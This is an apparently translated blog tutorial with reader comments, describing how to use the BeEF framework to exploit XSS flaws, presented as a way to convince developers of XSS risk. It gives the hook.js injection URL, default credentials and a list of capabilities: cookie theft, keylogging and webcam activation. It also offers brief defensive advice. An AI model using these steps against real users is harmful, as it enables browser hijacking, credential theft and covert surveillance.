Detect and correct XSS flaws with Beef

Most developers when showing them an XSS flaw with a JavaScript pop-up like "hack" or "hello" it does not impress them ... and they answer that JavaScript is secure, and that it runs sideways customer.
So as I don't have time to code with JavaScript to show you that the XSS flaw is dangerous, I will demonstrate it with the Beef tool, a Web 2.0 operating framework coded in PHP & JavaScript.

Beef is a powerful professional security tool, unlike other security tools, beef focuses on exploiting vulnerabilities on the browser (client) side to assess the security level of a target. Thanks to Beef, and its xss attack vector, it is possible to transform a victim into a zombie.

What can we do with beef?

Information retrieval
Theft of cookies (obviously)
Keylogger
List of sites / domains visited
Browser fingerprint (OS, plugins, etc.)
Webcam!

Architecture Beef

When a user runs BeEF, two components are opened: the user interface and the communication server (CRC). These two elements are the basic building blocks of Beef.

User interface
This is the interface for controlling the use of beef. From there, a user can see the victims who are online and offline, perform exploits against them, and see the results.

Communications Server
The Communication Server (CS) is the component that communicates via HTTP with infected browsers.

Installation

Beef is available on Linux with the Kali Linux distribution. If you have a Windows computer then I advise you before going further to install a Linux distribution (like kali Linux) on a virtual machine. Just download VMware and an image of Kali Linux. Beef is already pre-installed on it. here is how to install Kali Linux on a Windows machine with VMware.

However you can install beef on Windows, for that see: http://code.google.com/p/beef/wiki/WindowsInstall
To install it on another Linux or OSX distribution - see: http://code.google.com/p/beef/wiki/Install

How to use Beef?

To start, launch the beef server in Backtrack. To do this, go to the menu:
Application -> backtrack-> Application -> Exploitation tools -> Social Engineering Tools -> Beef XSS Framwork-> Beef

The server will start in a few seconds then you will have a window with information on the links used for the web interface as well as the script that you must inject into vulnerable pages.

In the example above, you can see, there are multiple network interfaces. You can now access the administration interface (web interface) using these URLs.
In my case, the administration interface is: http://192.168.230.128:3000/ui/panel and the script to inject is: http://192.168.230.128:3000/hook.js
After launching the administration page, you will have an authentication page. Log in to the Beef server using the default credentials (beef / beef).

Once connected, you will have a page divided into 4 parts:

Zombie part: this is where your connected victims are
Command part: in this part contains a number of commands that can be executed on the target with a colored indicator about their, relative safety. this is the most powerful part of Beef framework.
Result party: the results of the executed commands will be listed here.
Party description: here you will have the description of each order.

It now remains to inject the hook.js into a vulnerable forum or simply a web application that contains a XSS flaw.
However you can test beef locally using the beef demo page: http://127.0.0.1:3000/demos/basic.html

After the browser infection, you should see a target added to the left of the administration panel.
Finally, select this browser to display information on the target, so you can launch commands to have the last sites visited or to place a keylogger or to start the target's camera.

How to protect yourself?

Updating browsers and plugins is the first rule!
Install a firewall on your machine
Install Anti XSS on your browser such as "Noscript". It only allows the execution of JavaScript scripts on the trusted domains of your choice. It prevents the exploitation of XSS or CSRF vulnerabilities without loss of functionality.

Conclusion

Beef is an easy to use and very practical tool. Thanks to beef, advanced XSS attacks become easy to perform.
I hope I was able to convince you that the impact of an XSS vulnerability is terrible and that with a tool like beef, you can turn a simple XSS vulnerability into a very dangerous vulnerability.
And before I forget… Consider sharing this article by clicking on the social network buttons. It will give me great pleasure! 🙂

Those who liked this article also liked these:

twisterblack says:

December 4 2013 to 9 22 h min

I still don't understand the use of beef...
What is this tool for? to infect your own browser? if not, how to inject the hook.js page (which was created on our pc), on the victim's site, even with an XSS flaw and all the stuff we can't (in practice) on a remote site.
Finally I hope I am wrong so that you explain to me in more detail the operation of this tool and the injection of the script into a vulnerable site.
Thank you very much.

- Vince says:
  
  October 19 2016 to 17 09 h min
  
  Moreover, if you did it yourself without Beef, you would just have to inject a script via the XSS flaw so that this script would be executed discreetly when the user arrives on the page.
  Even a simple alert("Hello world!"); will display a popup in the user. Then you can have fun making 50 million popups appear too. It all depends on the type of attack you want to perform 😉
  
elhadj says:

16 2013 June to 22 08 h min

I have a question about beef how to use it online (with a domain name)